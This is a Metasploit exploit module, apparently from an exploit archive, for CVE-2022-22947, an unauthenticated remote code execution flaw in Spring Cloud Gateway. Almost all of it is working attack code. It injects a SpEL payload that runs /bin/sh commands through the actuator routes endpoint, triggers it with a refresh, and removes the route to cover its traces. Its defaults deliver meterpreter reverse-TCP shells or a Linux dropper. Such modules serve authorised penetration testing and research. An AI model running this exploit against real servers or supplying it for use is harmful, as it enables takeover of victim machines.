Spring Cloud Gateway 3.1.0 Remote Code Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
prepend Msf::Exploit::Remote::AutoCheck  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Spring Cloud Gateway Remote Code Execution',  
'Description' => %q{  
This module exploits an unauthenticated remote code execution vulnerability in Spring Cloud Gateway  
versions = 3.1.0 and 3.0.0 to 3.0.6. The vulnerability can be exploited when the Gateway Actuator  
endpoint is enabled, exposed and unsecured. An unauthenticated attacker can use SpEL  
expressions to execute code and take control of the victim machine.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'Ayan Saha'  
],  
'References' => [  
['CVE', '2022-22947' ],  
['URL', 'https://github.com/crowsec-edtech/CVE-2022-22947'],  
['URL', 'https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/'],  
['URL', 'https://tanzu.vmware.com/security/cve-2022-22947'],  
['URL', 'https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published']  
],  
'Platform' => 'linux',  
'Arch' => [ARCH_X64, ARCH_CMD],  
'Targets' => [  
[  
'Unix Command',  
{  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Type' => :unix_cmd,  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp',  
'RPORT' => 9000  
}  
}  
],  
[  
'Linux (Dropper)',  
{  
'Platform' => 'linux',  
'Arch' => [ARCH_X64],  
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },  
'Type' => :linux_dropper  
}  
],  
],  
'DisclosureDate' => '2022-01-26',  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [ CRASH_SAFE ],  
'Reliability' => [ REPEATABLE_SESSION ],  
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]  
}  
)  
)  
end  
  
def run_command(cmd)  
route_name = Rex::Text.rand_text_alpha(8).downcase  
uri = "/actuator/gateway/routes/#{route_name}"  
value = '#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/sh","-c", "' + cmd + '"}).getInputStream()))}'  
  
data = {  
'id' => route_name,  
'filters' => [  
{  
'name' => 'AddResponseHeader',  
'args' =>  
{  
'name' => 'Result',  
'value' => value  
}  
}  
],  
'uri' => "http://#{Rex::Text.rand_text_alphanumeric(6..15)}.com"  
}  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(uri),  
'ctype' => 'application/json',  
'data' => JSON.generate(data)  
})  
  
if res && res.code == 201 && res.message == 'Created'  
return route_name  
else  
return nil  
end  
end  
  
## Takes in the command and creates a new route with it on the server  
def execute_command(cmd, _opts = {})  
route_name = run_command(cmd)  
if route_name  
refresh  
cleanup_route(route_name)  
else  
return false  
end  
return true  
end  
  
## Cleaning up the routes created  
def cleanup_route(route_name)  
uri = "/actuator/gateway/routes/#{route_name}"  
res = send_request_cgi({  
'method' => 'DELETE',  
'uri' => normalize_uri(uri)  
})  
  
if res && res.code == 200  
print_good('Route deleted')  
return true  
else  
print_error("Couldn't delete route. Might require manual cleanup.")  
return false  
end  
end  
  
def check  
print_status('Checking if server is vulnerable')  
res = execute_command('whoami')  
  
if res  
return Exploit::CheckCode::Vulnerable  
else  
return Exploit::CheckCode::Safe  
end  
end  
  
## Refresh the gateway to trigger the routes with commands created  
def refresh  
print_status('Triggering code execution using routes')  
uri = '/actuator/gateway/refresh'  
  
send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(uri)  
})  
end  
  
def exploit  
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")  
case target['Type']  
when :unix_cmd  
execute_command(payload.encoded)  
when :linux_dropper  
execute_cmdstager  
end  
end  
  
end  
`